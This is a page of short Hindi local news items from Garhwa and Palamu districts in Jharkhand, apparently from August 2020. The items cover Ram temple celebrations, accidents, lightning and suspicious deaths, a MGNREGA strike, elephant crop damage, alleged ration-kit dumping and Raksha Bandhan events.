कांडी। गढ़वा। पूर्व बीस सूत्री अध्यक्ष ने राम मंदिर के भूमि पूजन के अवशर पर घर में पांच दिए जलाने का किया आग्रह


कांडी। गढ़वा। 5 अगस्त को भारत में एक इतिहास रचने नरेंद्र मोदी की सरकार जा रही है। सैकड़ो वर्षो से भगवान राम के साथ साथ राम भक्तों को भी राम मंदिर की आस लगी हुई थी। यह मंदिर भक्तों के लिए एक सपना बनकर रह गई थी। प्रधानमंत्री नरेंद्र मोदी ने न केवल भारत के राम भक्तों की अपितु विश्व के सभी हिंदुओं के सपनो को साकार किया है। और 5 अगस्त को एक ऐतिहासिक कदम की ओर जा रहे हैं। अयोध्या में श्रीराम मंदिर निर्माण की भूमि पूजन होने जा रहा है। इस कार्य से बीजेपी कार्यकर्ताओं में भी अलग उत्साह दिखने को मिल रही है। कांडी प्रखंड के पूर्व बिस सूत्री अध्यक्ष रामलला दुबे ने सभी कांडी वासियों से आग्रह किया है कि सभी कोई अपने अपने घरों में दिए जला कर उत्सव मानये ताकि इस अवशर पर हमारा कांडी भी जगमगा उठे।

4 total views, 4 views today

बड़ी खबर । केतार । गढ़वा । अनियंत्रित होकर कुएं में गिरा बाइक, बाइक सवार सहित चार हुए जख्मी

केतार से पप्पू दुबे की रिपोर्ट

केतार । गढ़वा । केतारथाना क्षेत्र के परसोडीह निवासी मुन्ना रजवार बाइक JH 03X 5209 पर चंद्रबली रजवार,नेपुरी कुंवर,बरती देवी को बैठाकर चौबे मझिगावा अपने घर से जा रहा था।बांसडीह खुर्द ज्यो ही पहुचा तीखी मोड़ के पास बिपरीत दिशा से आ रहे बोलेरो से साइड लेने के क्रम में बाइक अनियंत्रित हो गया और कुंवे में जा गिरा।आनन फानन में स्थानीय लोगो ने तत्काल रस्सी के सहारे गिरे लोग एवं बाइक को बाहर निकालने में सफल रहे।स्थानीय लोगो ने बताया कि मुन्ना रजवार शराब पीकर टंकी पर बैठकर बाइक चला रहा था।तभी बोलेरो से साइड लेने के क्रम में कुँए में जा गिरा,जिससे चारो लोगो को चोट आई। नेपुरी कुंवर को गंभीर चोट आई है।स्थानीयों इस शीघ्र 108 डायल कर एम्बुलेंस बुलाया।चारो जख्मी को एम्बुलेंस कांडी स्वास्थ्य केंद्र इलाज के लिए भेज दिया गया।तभी केतार थाना घटना स्थल पर पहुंच कर बाइक को अपने कब्जे में ले लिया।

12 total views, 12 views today

नावा बाजार। पलामू। मनरेगा कर्मियों के हड़ताल से नावा बाजार क्षेत्र में मनरेगा मजदूर हुए प्रभावित

नावा बाजार । पलामू । मनरेगाकर्मियों की राज्यव्यापी हड़ताल का असर अब नावा बाजार मे भी दिखने लगा है । हड़ताल से पहले नावा बाजार प्रखंड पूरे जिले में मानव दिवस में अव्वल रहता था । आज विगत एक सप्ताह से एक रुपया का भी मानव दिवस का सृजन नही हुआ । जहां हड़ताल से पूर्व दो हजार मजदूर प्रतिदिन कार्य करते थे । अब मात्र 650 मजदूर ही कार्य करते दिख रहे है । जिसमे अधिकतर मस्टर रोल में ही है। धरातल पर मजदूर भी नही दिख रहे हैं । हड़ताल से पूर्व 6 योजना प्रति ग्राम मे कार्य चलती थी आज महज 3 है । मनरेगाकर्मियों की हड़ताल असरदार है और धरातल पर सफल भी है। प्रखंड कार्यक्रम पदाधिकारी आनंद कुमार ने बताया कि हड़ताल र्पुन रुप से सफल है। धरातल पर कोई काम नही हो रहा है। सभी जनप्रतिनिधि,मेठ, लाभुक सभी का समर्थन मिल रहा है। हमने कोरोना के समय मे भी निस्वार्थ भाव से सबकी सेवा की है।कार्य के लिए रात दिन एक कर दिया। मुख्यमंत्री से हमे आस है कि चुनाव पूर्व हमलोगों से जो वादा किया था उसे पूरा करेगें। हम सब मनरेगा कर्मियों काम करना चाहते है । सरकार हमे भी अन्य कर्मियों के समान वेतन और सुविधाऐ मिलनी चाहिए। इस लिए सरकार सार्थक पहल कर हमारी समस्याओं का निराकरण करे।

48 total views, 48 views today

रंका । गढ़वा । रंका हुआ राम मय खुशी में बना हर मुहल्लें गली में लड्डू

रंका । गढ़वा । रंका हुआ राम मय रंका पंचायत के सभी मोहल्ले में 5 अगस्त को राम मंदिर बनाने की खबर सुन रंका पंचायत के मेन रोड स्थित सुनील साहू, रामानुज सिंह, टिंकू सिन्हा, सतिष मालाकार, सुरज चंद्रवंशी, संजय सिन्हा, विकास मधेशिया, कौशल कुमार,रवि गुप्ता, सौरभ कुमार, रनजीत सोनडिक आदि लोगों ने राम मंदिर शुभारंभ होने की खुशी में लड्डू बनवा रहे हैं, जो रंका गढ़ फाटक के पास एकावन केजी श्री राम सेना की ओर से 31 केजी, दुर्गा मंडप की ओर से 21 केजी, रंका नाका के लोगों के सहयोग से 11 के जी, एवं बर मोहल्ला के सहयोग से एक 31 केजी लड्डू कारीगर के द्वारा बनवाया जा रहा है जो हर घर को 11 लड्डू राम मंदिर के शुभारंभ के खुशी पर हर घर को 11 लड्डू दिया जाएगा ।

12 total views, 12 views today

नावाबाजार। पलामू । करंट से एक हनुमान जी की मौत, RSS के द्वारा किया गया अंतिम संस्कार


नावा बाजार । पलामू । कंडा गांव के प्रजापति मोहल्ला मे करंट लगने से एक हनुमान कि हुई मौत। मौत कि खबर जैसे ही RSS कार्यकर्ता साजन विश्वकर्मा को जानकारी मिला तो अपने साथ टिंकू प्रजापति, अक्षय प्रजापति, मुकेश प्रजापति के साथ फौरन घटनास्थल पर पहुंचकर सभी लोगो ने मनवाता को दिखाते हुए तुरंत हनुमान को वस्त्र देकर अंतिम संस्कार किया गया । इन दिनों काफी समय से कंडा गांव में दर्जनों हनुमान गांव में ही घुम-घुम कर छत व पेड़ पर रहते हैं । जिसमें एक वर्ष पूर्व भी एक हनुमान जी को करंट से ही मौत और वज्रपात से तीन कि मौत हुआ था।

11 total views, 11 views today

नावाबाजार । पलामू । सरकारी प्रावधान के तहत मिलने वाली सभी सुविधा आश्रित परिवार को मुहैया कराई जाएगी:अनुज


नावा बाजार । पलामू । कंडा पंचायत के ताली गांव निवासी 36 वर्षीय उपेंद्र भुईयां पिता स्व: नरेश भुइयां कि ब्रेन मे बुखार रहने के कारण मेदनी नगर सदर अस्पताल में सोमवार की रात्रि में मौत हो गई । मृतक उपेंद्र भुइँया के शव मंगलवार के घर पहुचते ही परिजनो समेत गांव मे मातम छा गई । मौत के खबर सुनकर जिलापार्षद अनुज राम, रबदा पंचायत के मुखीया बीरेंद्र भुइयां, समाजसेवी विनोद विश्वकर्मा, रामराज भुइयां,शिक्षक शम्भु राम समेत कई लोग मृतक के घर पहुंच कर परिजनो कि बीच ढांढस बनाई और धैर्य रखने की संतान दि । वही जिला पाषर्द अनूज राम ने कहा कि उनके परिवार को सरकारी प्रवधान के तहत मिलने वाली सभी सरकारी लाभ आश्रित परिवार को दिलाया जाएगा । मृतक उपेंद्र अत्यंत ही गरीब परिवार से विलोम करता था जिसे 4 छोटे-छोटे बच्चे हैं इस दुखद घटना से परिवार के बीच बहुत बड़ी चुनौती आ गई है जिससे आश्रित परिवार को बच्चे की परवरिश कर घर चलाना मुश्किल हो गया है और रो-रो कर बुरा हाल है ।

2 total views, 2 views today

नावा बाजार। पलामू। NH-98 थाना समीप चेक पोस्ट पर वाहन चेकिंग अभियान लगातार जारी


नावा बाजार । पलामू । NH-98 मुख्य औरंगाबाद-मेदनी नगर मुख्य मार्ग मे नावा बाजार थाना समिप चेक पोस्ट पर थाना प्रभारी वासुदेव मुण्डा के आदेशानुसार लगातार वाहन चेकिंग अभियान जारी है । NH-98 से गुजरने वाले सभी टू व्हीलर व फोर व्हीलर वाहन के गहन जांच के बाद ही छोडा जा रहा है । वही टू व्हीलर व फोर व्हीलर मे सफर करने वाले सभी व्यक्ति को हेलमेट व मास्क लगाने के प्रति मजिस्ट्रेट अशोक कुमार सिंह, प्रशिक्षु दरोगा कुणाल राजा के द्वारा वाहनों को रोककर मास्क लगाने व हेलमेट पहने के लिए जागरूक किया गया और सोशल डिस्टेंसिंग के पालन करते हुए सरकार के निर्देशानुसार ओवरलोड लेकर ऑटो या टू व्हीलर के चालको को फटकार भी लगाई गई। वही चेतावनी देते हुए कुणाल राजा ने कहा कि घर से निकलते ही मास्क और हेलमेट पहनना अर्निवाय है । इस लिए चालक आगे से गलती न करें। हिदायत कर छोड़ा जा रहा है ।

5 total views, 5 views today

भंडरिया । गढ़वा । हाथियों का एक समूह ने दो घंटे तक उत्पात मचाते हुए फसल को किया नष्ट

हाथियों के द्वारा नष्ट किए गए फसल को दिखाता किसान

  भंडरिया से देवानन्द कुमार की रिपोर्ट

भंडरिया । गढ़वा । प्रखंड मुख्यालय से महज चार किलोमीटर की दूरी पर भंडरिया वन क्षेत्र के नौका गांव में विती रात्रि हाथियों का एक झुंड ने दो घंटे तक जमकर उत्पात मचाते हुए खेत में लगें धान व मक्का की फसल को पुरी तरह से नष्ट कर दिया।हाथियों ने जिन किसानों का फसल नष्ट किया उनमें इन्द्रदेव सिंह के 50डिसमील में मक्का की फसल तथा 70डिसमील में धान की फसल वहीं गुडु सिंह के 20डिसमील में मक्का की खेती शामिल हैं। लोगों ने बताया कि हाथियों का झुंड आधी रात को जंगल से निकलकर बस्ती में आया तथा दो घंटे तक जमकर उत्पात मचाते हुए फसल को नष्ट करनें के बाद वापस जंगल की ओर चलें गए। हाथियों के समुह में एक बच्चा हाथी भी शामिल है। हाथियों के चिंघाड से आसपास के लोग पुरी तरह से दहशत में थे। लोग किसी तरह रात गुजारने को विवश थे। भुक्तभोगियो के द्वारा मंगलवार की सुबह इसकी सुचना वन विभाग को दिया गया साथ ही वन क्षेत्र पदाधिकारी के नाम आवेदन देकर मुआवजे की मांग की गई।

10 total views, 10 views today

बड़ी खबर । कांडी । गढ़वा । वज्रपात से चटनियां गांव के युवक की मौत

कांडी से अरुण कुमार चौबे

> प्रखंड में वज्रपात से मरने वालों की संख्या हुई तीन

कांडी। गढ़वा। कांडी थाना क्षेत्र के चटनियां गांव स्थित कुशवाडेरा टोला निवासी दशरथ यादव की मौत सोमवार की देर शाम वज्रपात से हो गई। दशरथ यादव अपने खेत में काम कर रहे थे। कांडी प्रखंड में वज्रपात की यह तीसरी घटना है। इससे पूर्व 22 जुलाई को घोड़दाग गांव में वज्रपात से एक बैल की मौत हो गई थी तथा 23 जुलाई को इसी गांव की एक महिला धान की रोपनी करते वक्त वज्रपात की शिकार हो गई थी। ग्रामीणों की सूचना पर कांडी पुलिस मौके पर पहुंचकर शव को पोस्टमार्टम के लिए गढ़वा भेज दिया। प्रखंड में वज्रपात से जान जाने का यह कोई नया मामला नही है हर वर्ष वज्रपात से कई लोगों की जान चली जाती है।

12 total views, 12 views today

कांडी। गढ़वा। सील किये गए इलाके की खुली पोल, नही दिखे एक भी नियुक्त किये गए अधिकारी

सील किये गए स्थान पर निगरानी करता चौकीदार

कांडी से अरुण कुमार चौबे

कांडी। गढ़वा। बीते 30 जुलाई को कांडी प्रखंड विकास पदाधिकारी जोहन टुड्डू ने मझिगावां में संक्रमित पाए व्यक्ति के आस पास के इलाके को सील किया था और वंहा पर निगरानी के लिए तीन बीटीएम व एक चौकीदार को नियुक्त किया गया था। और सभी को आठ आठ घंटे का शिफ्ट करने को कहा गया था। वहां आस पास के लोगों ने जानकारी देते हुए कहा कि आज तक यंहा निगरानी के नाम पर केवल चौकीदार ही रहा बाकी तीन बीटीएम कैसे हैं हम लोग आज तक देखें ही नही की किसका किसका यंहा ड्यूटी लगा हुआ था। किसी अधिकारी के ड्यूटी नही करने से सील किये गए दोनों तरफ के लोगों को काफी परेशानियों का सामना करना पड़ रहा है। वंही सील किये गए अंदर के लोग अपनी रोजमर्रा की सामानों को लेने बाहर निकलते है। तभी लोग हो हल्ला करने लगते हैं। जबकि बाहर के लोगों का कहना है कि सील किये गए क्षेत्र के लोग खुलेआम घूम ही रहे हैं तो यह दिखावे के लिए बांस का घेरा क्यों लगाया गया है। जबकि सील के अंदर के लोग कहते हैं कि वंहा पर कोई कर्मचारी नही होने पर हम अपनी समनो को किससे मंगवाएँगे हमारी मजबूरी है कि हम खुद ही जाकर समान लाएंगे। मामले की पूछ ताछ के लिए जितने भी संबधित अधिकारी के पास फोन किया गया उनसे संपर्क नही हो पाया। अब इसमें क्या अंदाजा लगाया जाए कि बीटीएम बीडीओ कांडी के आदेशों की अवहेलना कर रहे हैं या तो किसी बीटीएम की ड्यूटी लगी ही नही केवल ऐसे ही बता दिया गया कि यंहा अधिकारी का ड्यूटी लगाया गया है।

17 total views, 17 views today

बड़ी खबर | भवनाथपुर | गढ़वा | गड़ेरियाडीह टोला के एक वृद्ध महिला का संदेहास्पद स्थिति में मौत

भवनाथपुर से सोनू चौबे की रिपोर्ट

भवनाथपुर । गढ़वा । भवनाथपुर थाना क्षेत्र अंतर्गत मकरी गाँव के गड़ेरियाडीह टोला में 75 वर्षीय एक वृद्ध महिला भगमनी कुँअर मौत संदेहास्पद स्थिति में सोमवार की रात कुआं में गिरने से हो गयी।मृतका सोमवार से ही घर से गायब थी,परिजनों द्वारा खोजबिन के दौरान मृतिका का शव मंगलवार की सुबह घर से कुछ दुरी पर स्थित कुआं से बरामद किया गया।इसकी जानकारी मिलते ही थाना के एएसआई माणिक राम व पीएसआई संजय बेदिया पुलिस बल के साथ घटनास्थल पर पहुंचकर शव को कब्जे में लेते हुए अंत्यपरीक्षण के लिए गढ़वा भेजवाया। मृतका भगमनी कुंवर के पुत्र धर्मदेव पाल ने पुलिस को बताया कि खोज बिन के दौरान मंगलवार के सुबह मालूम हुआ मेरी माँ का शव कुआ में पड़ा हुआ है। उसने यह भी बताया कि ग्रामीणों द्वारा जब कुआं से शव निकाला गया था, उस समय मृतिका के साडी के आंचल में एक नया ईट बंधा हुआ था।पुलिस मृतिका के मौत को लेकर मामले की जाँच पड़ताल कर रही है।

12 total views, 12 views today

बिग ब्रेकिंग | मझिआंव | गढ़वा | अज्ञात शव को पुलिस ने किया बरामद

मझिआंव से सूर्य प्रकाश की रिपोर्ट

मझिआंव । गढ़वा । थाना क्षेत्र के बूढ़ीखांड़ महुरान में क्रेशर के सामने कोयल नदी में क्रेशर से 200 मीटर की दूरी पर एक टापू के बगल में छाड़न पर मिला दुर्गंध देता एक अज्ञात व्यक्ति का शव। चारवाहा लोगों के द्वारा शव होने की खबर 3 बजे के लगभग आग की तरह फैल गई। जिसकी सूचना थाना प्रभारी शुधांशु कुमार को मिला। वहीं जानकारी के बाद गश्ती दल में एएसआई कंचन रजक दल बल के साथ पहुंचकर शव को देखा और मौके पर थाना प्रभारी सुधांशु कुमार, पीएसआई शिवलाल कुमार गुप्ता भी घटनास्थल पर पहुंच कर शव को देखा। वही 5 दिन पूर्व सतबरवा थाना क्षेत्र के सिंदुरिया नदी में बीते दिन दो युवकों को डूबने की खबर है। जिसमें रेडमा निवासी अभिनव तिवारी का शव बरामद कर लिया गया था। लेकिन पोल निवासी शौर्य तिवारी कासव अभी तक नहीं मिल पाया है, जो कि इसकी खबर जोरों पर है। वही थाना प्रभारी सुधांशु कुमार के द्वारा सतबरवा थाना प्रभारी से भी संपर्क कर जानकारी दिया गया। और शव का हुलिया भी बताया गया। बताते चलें कि अज्ञात व्यक्ति का उम्र लगभग 20 वर्ष होगा जिसका लंबाई लगभग 5 फीट होगा‌। वहीं शव बिल्कुल निर्वस्त्र था। वहीं पुलिस द्वारा शव को अपने कब्जे में लेते हुए पोस्टमार्टम हेतु गढ़वा भेज दिया गया।

20 total views, 20 views today

धुरकी । गढ़वा । भंडार गांव के मुखिया ने परवासी मजदूर के राशन खाद सामग्री तालाब में फेंका

धुरकी । गढ़वा । धुरकी प्रखंड के भंडार गांव मे सुखा राशन कीट गांव के हथिया नाला तालाब मे फेंकने का मामला प्रकाश में आया है। उक्त सुखा राशन कीट गांव के गरीब निर्धन मजदूरों के बीच वितरण किया जाना था। यह राशन सुबे के मुख्यमंत्री हेमंत सोरेन के निर्देश पर देश के विभिन्न राज्यों से वापस अपने-अपने गांव मे लौटने व चौदह दिनों के होम क्वायरेंटाइन मे रहने वाले मजदूरों के बीच बांटने के लिए मिला था। उक्त सुखा राशन खाद्द सामग्री कीट जिसमे दस किलो चावल, दो किलो दाल, दो किलो आलू, एक किलो प्याज, एक लीटर सरसों तेल, एक किलो नमक उक्त पैकेट पैक कर तैयार कर मजदूरों के बीच वितरण करने के लिए पंचायत के मुखिया पचिया देवी को पूरी जवाबदेही और जिम्मेवारी के साथ मिला था। बीडीओ रंजीत कुमार सिन्हा के द्वारा पूर्व में ही निर्देशित किया गया था की उक्त खाद सामग्री का पैकेट तत्काल मजदूरों के बीच वितरण करना है। उसके बावजूद भी उक्त पंचायत के मुखिया ने सुखा खाद्य सामग्री का पैकेट मजदूरों के बीच वितरण नहीं किया। वहीं रविवार की शाम में जब ग्रामीणो की नजर हथिया नाला तालाब में खाद्य सामग्री पैकेट के साथ गहरे पानी में उपलाए हुए नजर आया तो पूरे गांव मे यह खबर फैल गई। वहीं देखते ही देखते ग्रामीणों की भीड़ एकत्रित हो गई। ग्रामीण किशन पासवान, विकास कुमार, विजय राम, विशाल सिंह, राजेश्वर साह, नंदलाल कुमार, संतोष लोहरा, अनिल बैठा, सुमित गुप्ता, शिव पूजन राम, विजय बैठा व मंदीप सिंह सहित काफी संख्या मे ग्रामीणों ने इसकी सूचना थाने में भी दिया है। वहीं उपरोक्त ग्रामीणों ने उपायुक्त गढ़वा के नाम से एक आवेदन भी मुखिया के विरुद्ध लिखा है, लिखित आवेदन के माध्यम से उक्त ग्रामीणों ने मुखिया पचिया देवी पर आरोप लगाते हुए लिखा है की उक्त रासन का पैकेट मजदूरों के बीच वितरण करने के लिए मुखिया को मिला था, ग्रामीणों ने आरोप लगाया है की मुखिया ने कालाबाजारी करने के लिए प्रवासी मजदूरों का रासन वितरण नहीं किया। वहीं आलू प्याज को बचने के उद्देश्य से तालाब मे डाल दिया। ग्रामीण ने उक्त मुखिया पर उपायुक्त से कार्यावाई करने का मांग किया है।

199 total views, 104 views today

रेहला | विश्रामपुर | पलामू | सेवानिवृत होने पर चौकीदार को सम्मान पूर्वक दी गयी विदाई

विदाई समारोह में मौजूद लोग

विश्रामपुर | पलामू | विश्रामपुर थाना परिसर में आयोजित सादे समारोह में सेवानिवृत्त हुये चौकीदार सत्या मांझी को सम्मान पूर्वक विदाई दी गयी.सम्मान सह विदाई समारोह की अध्यक्षता थाना प्रभारी श्रीभगवान सिंह व संचालन नावाडीह कला ओपी प्रभारी अनंत कुमार सिंह ने किया.यहां उल्लेखनीय है कि चौकीदार सत्या मांझी विश्रामपुर अनुमंडलीय थाना अंतर्गत नौगढ़ ओपी में कार्यरत थे.पिछले 31 जुलाई को श्री मांझी सेवानिवृत हो गये.समारोह में विश्रामपुर थाना प्रभारी श्रीभगवान सिंह व नावाडीह कला ओपी प्रभारी अनंत कुमार सिंह ने सेवानिवृत चौकीदार सत्या मांझी को शॉल ओढ़ाकर सम्मानित किया.इसके अलावे कई पुलिस पदाधिकारियों व जवानों ने भी श्री मांझी को मेमोंटो देकर सम्मानित किया.थाना प्रभारी श्रीभगवान सिंह ने कहा कि चौकीदार सत्या मांझी ने पूरी ईमानदारी के साथ अपने कर्तव्यों का निर्वहन किया है.ओपी प्रभारी अनंत कुमार सिंह ने कहा कि चौकीदार सत्या मांझी ने सेवाभाव के साथ अपनी ड्यूटी निभाई है.जो दूसरों के लिये प्रेरणादायी है.सम्मान से अभिभूत होकर सत्या मांझी ने कहा कि यह पल मेरे जिंदगी के लिये सबसे अविस्मरणीय पल रहेगा.समारोह के बाद थाना प्रभारी श्रीभगवान सिंह ने सेवानिवृत चौकीदार सत्या मांझी को पूरे सम्मान के साथ अपने वाहन से घर तक जाकर छोड़ा.मौके पर प्रशिक्षु एसआई गुलटन मिस्त्री,आलोक सोरेन,प्रवीण रजक,रवि कुमार,
एएसआई राजकुमार चौधरी,संजय सिंह,पंकज सिंह,सुदामा कुमार सहित कई पुलिस पदाधिकारी व जवान शामिल थे.

35 total views, 11 views today

रेहला | विश्रामपुर | पलामू | पौधों को रक्षा सूत्र बांधकर बचाने का लिया संकल्प

वृक्ष को रक्षा सूत्र बांधते लोग

विश्रामपुर | पलामू | रक्षा बंधन के अवसर पर युवा समाज सेवी ऋतुराज मिश्रा ने अपने परिजनों व समर्थकों के साथ पौधों को रक्षा सूत्र बांधकर बचाने का संकल्प लिया.इस क्रम में श्री मिश्रा विश्रामपुर नगर परिषद के कई वार्डो में जाकर लोगो को पौधारोपण हेतु जागरूक भी किया.उन्होंने कहा कि पौधें वृक्ष बनकर जैसे प्रकृति की हिफाज़त करते है,वैसे ही हम सबो को भी पौधों की हिफाज़त करनी चाहिये.प्रतेयक वर्ष एक व्यक्ति को कम से कम 10 पौधे लगाना चाहिये ताकि पर्यावरण संतुलित रहे.इस दौरान उन्होंने कई जगहों पर पौधारोपण भी किया.मौके पर धनंजय पांडेय,कामेश्वर यादव,अर्जुन यादव, राजू सिंह,द्वारिका यादव सहित कई लोग मौजूद थे.

23 total views, 10 views today

खास खबर | रमना | गढवा | 4 अगस्त के ट्रायल के बाद मिलेगी बिजली

रमना से डॉ राहुल टंडवाल की रिपोर्ट

रमना। गढवा । जी हाँ चार अगस्त को भागोडीह ग्रिड से क्या मिलेगी बिजली ? जी सही सुना आपने पर अभी थोड़ी और अंधेरी रात बाकी है कुछ बात बाकी है।जैसा कि हमारे गढवा जिला अंतर्गत एक वायरल मैसेज छाया हुआ है कि चार अगस्त से ट्रायल के बाद तुरंत बिजली मिलना आरंभ हो जायेगा लोगों को ऐसा मानना है। मैसेज तो सही है किंतु अभी इस मे एक सप्ताह तक कि समय लग सकता है। पावर ग्रिड के एक इंजीनियर ने बताया कि कल से ट्रॉयल है। बिजली स्ट्रॉक हेल्दी रहा तो छः-सात दिन में बिजली संचरण कर दिया जाएगा ऐसा अनुमान लगाया जा रहा है।

68 total views, 21 views today

बिग ब्रेकिंग | पड़वा | पलामू | रेलवे पटरी पर मिली लाल जोड़े में अविवाहित लड़की की लाश, घटनास्थल पर बिखरा था सिंदूर


> पुलिस ने पोस्टमाॅर्टम के बाद शव को परिजनों को सौंप दिया

> लड़की रविवार की रात घर में अकेली ही थी, माता-पिता दूसरे गांव गए थे

नावा बाजार । पंडवा। पलामू। पड़वा थाना क्षेत्र में रेलवे पटरी के बीच एक युवती का शव बरामद किया गया। युवती लाल जोड़े में थी और घटनास्थल से सिंदूर बिखरा पड़ा मिला। घटना कजरी मध्य विद्यालय से सटे डाउन रेलवे ट्रैक पोल संख्या 395/2 की है। युवती ने आत्महत्या की या फिर यह हत्या है, पुलिस जांच में जुटी हुई है।

युवती की पहचान सोनाली कुमारी (18) के रूप में की गई। सोनाली अविवाहित थी और रविवार की रात घर में अकेली ही थी। उसके माता-पिता तरहसी के सेवती गांव अपने ससुराल गए थे। सोनाली रविवार की रात घर से निकल कर रेल लाइन पर पहुंची थी।

घटना की सूचना पाकर लड़की के माता-पिता कजरी स्थित अपने घर पहुंचे। इसके बाद परिजन सदर अस्पताल पहुंचे। जहां पुलिस ने पोस्टमाॅर्टम के बाद शव को परिजनों को सौंप दिया। रेल थाना डालटनगंज प्रभारी किशुन प्रसाद मृतका के परिजनों से पूछताछ के लिए कजरी उसके घर पहुंचे और परिजनों से पूछताछ की।

89 total views, 20 views today

नावा बाजार। पलामू। सोनम हत्याकांड के जांच के लिए मुख्यमंत्री के द्वारा पुलिस को र्निदेश देने पर, JKM अध्यक्ष ने किया स्वागत

नावा बाजार । पलामू । झारखण्ड क्रांति मंच के केंद्रीय अध्यक्ष शत्रुघ्न कुमार शत्रु ने प्रेस विज्ञप्ति जारी कर माननीय मुख्यमंत्री श्रीहेमन्त सोरेन द्वारा सोनम हत्याकांड की जांच करने व उसके परिवारजनों को न्याय दिलाने हेतू झारखण्ड पुलिस को निर्देश देने का स्वागत किया है। केन्द्रीय अध्यक्ष ने कहा है कि 29 अप्रैल को सोनम के साथ अपराधियों द्वारा दुष्कर्म व हत्या के बाद पाटन/पलामू पुलिस की आश्चर्यजनक चुप्पी व बाद में अपराधियों को पकड़कर छोड़ देने से आक्रोशित ग्रामीणों ने प्रदर्शन किया था । जिस पर पुलिस ने गोलीबारी कर महामारी एक्ट आदि में मुकदमा दर्ज कर गिरफ्तारी का मुहिम भी चला रखा है । उक्त मामले को लेकर झारखण्ड क्रांति मंच के द्वारा आन्दोलन के साथ ही समय-समय पर प्रेस विज्ञप्ति व बयानों को पत्रकारों के द्वारा लगातार कवरेज प्रदान कर आवाज को गति प्रदान किया हमेशा किया गया ,जिसके लिए हार्दिक धन्यवाद के पात्र हैं ।

26 total views, 7 views today

नावा बाजार। पलामू। भाई के समान वृक्षों पर भी राखी बांधने से ही होगी धरती व ब्रह्मांड के 84 लाख योनि जीवों की सुरक्षा : कौशल

नावा बाजार। पलामू।  छतरपुर अनुमंडल अंतर्गत डाली बाजार पंचायत के कौशल नगर परिसर में विश्वव्यापी पर्यावरण संरक्षण अभियान के राष्ट्रीय अध्यक्ष सह पर्यावरण धर्म और वन राखी मूवमेंट के प्रणेता पर्यावरणविद कौशल किशोर जायसवाल ने वृक्षों पर रक्षाबंधन कर उपस्थित लोगों को पर्यावरण धर्म के आठ मूल मंत्रों की शपथ दिलाई। उन्होंने कहा कि वनों की सुरक्षा केवल लाठी से नहीं वन राखी से भी होगी । वन राखी मूवमेंट के 44 वर्ष पूरा होने के उपरांत इस वर्ष भी वृक्षों पर रक्षाबंधन किये जा रहे हैं। वन राखी मूवमेंट के प्रणेता कौशल ने कहा कि 1967 में उनके द्वारा लगाए गए पौधे 10 वर्षों के बाद 1977 में जब वन माफिया उसे काटने लगे। तब उसे बचाने के लिए उन्होंने पर्यावरण धर्म बनाया। उस अभियान के तहत पेड़ों पर रक्षाबंधन कर ग्रामीणों को जागरूक किया गया। यह अभियान इतना तेजी से आगे बढ़ा कि सरकार द्वारा वनों की कटाई की जाने वाली नीलामी को भी उन्होंने बंद कराया । अभियान की सफलता पर उसमें शामिल महिला पुरुषों को अंग वस्त्र देकर सम्मानित किया गया। अब तक नेपाल भूटान समेत देश के 21 राज्य के 78 जिलों में एवं विश्व के 15 देशों से आए बौद्ध भिक्षु और पितृपक्ष के मेलों में पहुंचे लोगों को पर्यावरण धर्म और वन राखी मूवमेंट की जानकारी उपलब्ध कराकर उन्हें न सिर्फ जागरूक किया गया बल्कि पौधरोपण कर उन्हें शपथ भी दिलाई गई।  जिससे हजारों एकड़ उजड़े वन फिर से जंगल के रूप में आज देखने योग्य हो गए हैं। पर्यावरण धर्मगुरु कौशल ने कहा कि पलामू जिले के छतरपुर के एक छोटा सा गांव डाली बाजार से निकला हुआ यह अभियान देश और दुनिया के वनों की सुरक्षा और पौधारोपण करने पर लोगों को विवश कर दिया है। इतना ही नहीं अभियान की सफलता के कारण ही आज हर देश के लोग के साथ-साथ देश के राष्ट्रपति और प्रधानमंत्री भी पौधारोपण कर रहे हैं। पर्यावरण विद कौशल ने कहा कि मेरे द्वारा निजी खर्चों पर इस पुनीत कार्य को लगातार करने के कारण ए एन आई न्यूज एजेंसी ने मेरे कार्यों की पूरी दुनिया बताया जिसके कारण विश्व के 3 महान पुरुषों के जीवनी के साथ-साथ मेरा भी जीवनी की पढ़ाई के 11 वर्षों से की जाती है इस रक्षाबंधन पर देश और दुनिया के तमाम लोगों को हार्दिक शुभकामनाएं देते हुए कहा कि आज करोना पूरे विश्व में पैर फैलाया है । इस वैश्विक महामारी से बचने के लिए लोग अधिक से अधिक अपने घरों में रहे। मास्क और सेनीटाइजर का उपयोग के साथ सोशल डिस्टेंसिंग बना कर रहे। कार्यक्रम में उपस्थित लोगों को शॉल ओढ़ाकर एवं पौधा देखकर सम्मानित किया गया। कार्यक्रम में सुचित कुमार जायसवाल ,जुबेर अंसारी, अमरेंद्र कुमार रवि ,लक्ष्मण राम, उमेश राम ,संपतिया देवी, अनीता देवी मौजूद थे

9 total views, 3 views today

मझिआंव । गढ़वा । रक्षाबंधन भाई बहन का अटूट प्रेम का बंधन बडे हर्षोल्लास के साथ मनाया गया

मझिआंव से सूर्य प्रकाश की रिपोर्ट

मझिआंव । गढ़वा । रक्षा बंधन अटूट प्रेम का बंधन बड़े ही हर्षोल्लास के साथ देश के विभिन्न भागो में संपन्न हुआ।बहने अपने भाइयों की कलाइयों पर राखी बांधी और तिलक लगाकर आरती उतारी मिठाई खिलाई रक्षाबंधन को लेकर बाजार की दुकानों में नए-नए डिजाइनो का राखी खरीदारी की गई मझिआंव थाना क्षेत्र के लोग कोविड-19 महामारी को दरकिनार करते हुए बगैर सोशल डिस्टेंसिंग का अनुपालन किए जमकर खरीदारी की और साथ ही मिठाई की दुकान पर मझिआंव बाजार के सभी दुकानदारों ने कोविड-19 को लेकर रक्षाबंधन पर मिठाई कम मात्रा में बनाए थे उन्हें यह अहसास नहीं था कि ऐसी महामारी दौर में भी इतने जमावड़ा और भारी-भरकम भीड़ हो जाएगी। दुकानदारों ने रक्षाबंधन पर मिठाइयां भरपूर मात्रा में बिक्री करने में असफल नजर आए। हालांकि भीड़भाड़ से स्थानीय प्रशासन बेपरवाह नहीं लेकिन मझिआंव थाना क्षेत्र के अंदर विभिन्न क्षेत्रों में इसी तरह का नजारा देखने को मिला खुलेआम त्योहार के नाम पर इस महामारी में लोग कूद पड़े एक तरफ सरकार दिशा निर्देश देती है सामाजिक दूरी बनाए भीड़-भाड़ से बचे वहीं सरकार की ओर से स्थानीय प्रशासन को दिशा निर्देश जारी कर कहा गया है कि हर हाल में सामाजिक दूरी का पालन अपने-अपने क्षेत्रों में कराएं। फिर भी लोग कोरोना वायरस महामारी को भूलकर त्योहार मनाने में मशगूल रहे। हालांकि यह त्योहार आपसी भाई बहनों की बंधन का 